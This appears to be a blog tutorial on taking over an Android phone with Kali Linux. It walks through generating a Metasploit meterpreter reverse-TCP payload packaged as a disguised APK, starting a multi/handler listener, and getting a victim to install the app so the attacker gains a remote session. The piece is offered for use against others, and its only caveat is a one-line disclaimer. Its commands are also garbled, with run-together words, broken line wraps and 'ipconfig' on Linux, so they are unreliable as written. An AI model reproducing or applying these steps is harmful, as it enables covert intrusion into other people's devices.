
In this tutorial i will be using Kali Linux to hack android Phone!
Just Follow the below steps to hack android Phone:
1) Open Terminal and type:
ipconfig

To Check your IP address.Here my ip is 192.168.43.203 , which is alsothe attackers(my) ip address

2) Now i will be creating a dummy android app that i will sent to the victim.For that just type :
msfpayloadandroid/
meterpreter/reverse_tcp
LHOST=attacker_ip_address
LPORT=port_to_receive_
connectionR>
Appname.apk
Attacker_ip_address= your ip address that you found out using ipconfigport_to_receive_connection= 81

3) Now while waiting open up new terminal and type
msfconsole
to run the metasploit.
4) Now type
usemulti/handler

5) Now you have to type:
setpayloadandroid/
meterpreter/reverse_tcp
and then type
setLHOST<
Attacker_ip_address>
and then
setLPORT=81

6) Now send the dummy app to the victim..upload it to net or try any other method.
7) Once the victim install the application and runs it ,you will start seeing a session.

8) That’s it we are in the victims android phone and can whatever we want.Just type help inorder to get the list of commands!
DON'T USE IT TO HARM ANYONE OR ANY ILLEGAL PURPOSES I'M NOT RESPONSIBLE FOR THAT
No comments:
Post a Comment